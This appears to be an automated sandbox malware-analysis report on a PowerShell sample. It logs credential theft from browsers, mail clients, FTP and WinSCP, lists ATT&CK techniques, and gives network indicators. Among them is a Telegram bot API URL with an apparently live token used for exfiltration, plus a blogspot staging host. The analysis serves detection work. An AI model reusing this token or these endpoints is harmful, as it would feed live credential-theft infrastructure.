              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: Amcache.hve.10.drBinary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 00000005.00000002.3250437857.000000000286A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3250437857.000000000287A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6096, type: MEMORYSTR
              Source: Yara matchFile source: 00000006.00000002.2212429902.0000000000B9D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3250437857.000000000287A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6096, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: Yara matchFile source: 00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6096, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 00000005.00000002.3250437857.000000000286A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3250437857.000000000287A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6096, type: MEMORYSTR
              Source: Yara matchFile source: 00000006.00000002.2212429902.0000000000B9D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3250437857.0000000002829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.3250437857.000000000287A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6096, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Disable or Modify Tools
              2
              OS Credential Dumping
              1
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Command and Scripting Interpreter
              31
              Registry Run Keys / Startup Folder
              211
              Process Injection
              1
              Obfuscated Files or Information
              1
              Credentials in Registry
              35
              System Information Discovery
              Remote Desktop Protocol2
              Data from Local System
              1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell
              Logon Script (Windows)31
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              Security Account Manager341
              Security Software Discovery
              SMB/Windows Admin Shares11
              Email Collection
              11
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              File Deletion
              NTDS1
              Process Discovery
              Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Masquerading
              LSA Secrets161
              Virtualization/Sandbox Evasion
              SSHKeylogging14
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts161
              Virtualization/Sandbox Evasion
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
              Process Injection
              DCSync1
              System Network Configuration Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1431777 Sample: o3KyzpE7F4.ps1 Startdate: 25/04/2024 Architecture: WINDOWS Score: 100 40 api.telegram.org 2->40 42 minecap4-22-24.blogspot.com 2->42 44 3 other IPs or domains 2->44 56 Snort IDS alert for network traffic 2->56 58 Found malware configuration 2->58 60 Antivirus detection for URL or domain 2->60 64 6 other signatures 2->64 8 powershell.exe 3 44 2->8         started        11 mshta.exe 2->11         started        13 mshta.exe 2->13         started        15 3 other processes 2->15 signatures3 62 Uses the Telegram API (likely for C&C communication) 40->62 process4 dnsIp5 78 Creates autostart registry keys with suspicious values (likely registry only malware) 8->78 80 Creates multiple autostart registry keys 8->80 82 Creates an autostart registry key pointing to binary in C:\Windows 8->82 86 4 other signatures 8->86 18 RegSvcs.exe 15 2 8->18         started        22 RegSvcs.exe 2 8->22         started        24 MSBuild.exe 2 8->24         started        30 4 other processes 8->30 84 Bypasses PowerShell execution policy 11->84 26 powershell.exe 11->26         started        28 powershell.exe 13->28         started        54 127.0.0.1 unknown unknown 15->54 signatures6 process7 dnsIp8 46 ip-api.com 208.95.112.1, 49719, 80 TUT-ASUS United States 18->46 48 api.telegram.org 149.154.167.220, 443, 49720, 49721 TELEGRAMRU United Kingdom 18->48 50 api.ipify.org 172.67.74.152, 443, 49712 CLOUDFLARENETUS United States 18->50 66 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->66 68 Tries to steal Mail credentials (via file / registry access) 18->68 70 Tries to harvest and steal ftp login credentials 18->70 72 Tries to harvest and steal browser information (history, passwords, etc) 18->72 74 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 22->74 76 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 22->76 32 dw20.exe 12 24->32         started        52 blogspot.l.googleusercontent.com 142.251.15.132, 443, 49716, 49717 GOOGLEUS United States 26->52 34 conhost.exe 26->34         started        36 conhost.exe 28->36         started        38 dw20.exe 30->38         started        signatures9 process10

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              o3KyzpE7F4.ps15%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              fp2e7a.wpc.phicdn.net0%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://crl.microsoft0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              https://go.micro0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://crl.micro0%URL Reputationsafe
              http://crl.v0%URL Reputationsafe
              http://crl.v0%URL Reputationsafe
              http://crl.ver)0%Avira URL Cloudsafe
              https://minecap4-22-24.blogspot.0%Avira URL Cloudsafe
              http://pubsubhubbub.appspot.com/0%Avira URL Cloudsafe
              http://www.georss.org/georss0%Avira URL Cloudsafe
              http://pubsubhubbub.appspot.com/0%VirustotalBrowse
              http://www.georss.org/georss1%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              blogspot.l.googleusercontent.com
              142.251.15.132
              truefalse
                high
                api.ipify.org
                172.67.74.152
                truefalse
                  high
                  ip-api.com
                  208.95.112.1
                  truefalse
                    high
                    api.telegram.org
                    149.154.167.220
                    truefalse
                      high
                      fp2e7a.wpc.phicdn.net
                      192.229.211.108
                      truefalseunknown
                      minecap4-22-24.blogspot.com
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://minecap4-22-24.blogspot.com/hahafalse
                          high
                          https://minecap4-22-24.blogspot.com/hahafalse
                            high
                            https://api.telegram.org/bot6350883303:AAHET8Logo726LGRK7Ge4TmyyoY2y3wAp0I/sendDocumentfalse
                              high
                              https://api.ipify.org/false
                                high
                                https://minecap4-22-24.blogspot.com/atom.xmlfalse
                                  high
                                  http://ip-api.com/line/?fields=hostingfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://www.blogger.com/feeds/3408437705493384378/posts/default?alt=atompowershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.orgRegSvcs.exe, 00000005.00000002.3250437857.0000000002874000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.3250437857.0000000002A09000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://crl.microsoftpowershell.exe, 00000017.00000002.2534722701.0000028E2B315000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://contoso.com/Licensepowershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000012.00000003.2335885953.00000235C65F0000.00000004.00000800.00020000.00000000.sdmp, edb.log.18.dr, qmgr.db.18.drfalse
                                          high
                                          http://pubsubhubbub.appspot.com/powershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • 0%, Virustotal, Browse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://api.ipify.orgRegSvcs.exe, 00000005.00000002.3250437857.00000000027B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://blogspot.l.googleusercontent.compowershell.exe, 0000000F.00000002.2322477147.000002D2AB25C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2322477147.000002D2AB27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DA55000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.google.com/g/2005powershell.exe, 0000000F.00000002.2322477147.000002D2AB2F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2535220422.0000028E2DAD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/powershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2595181727.00000244287F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://ip-api.comRegSvcs.exe, 00000005.00000002.3250437857.0000000002816000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.google.com/g/2005#thumbnailpowershell.exe, 00000017.00000002.2535220422.0000028E2DACA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
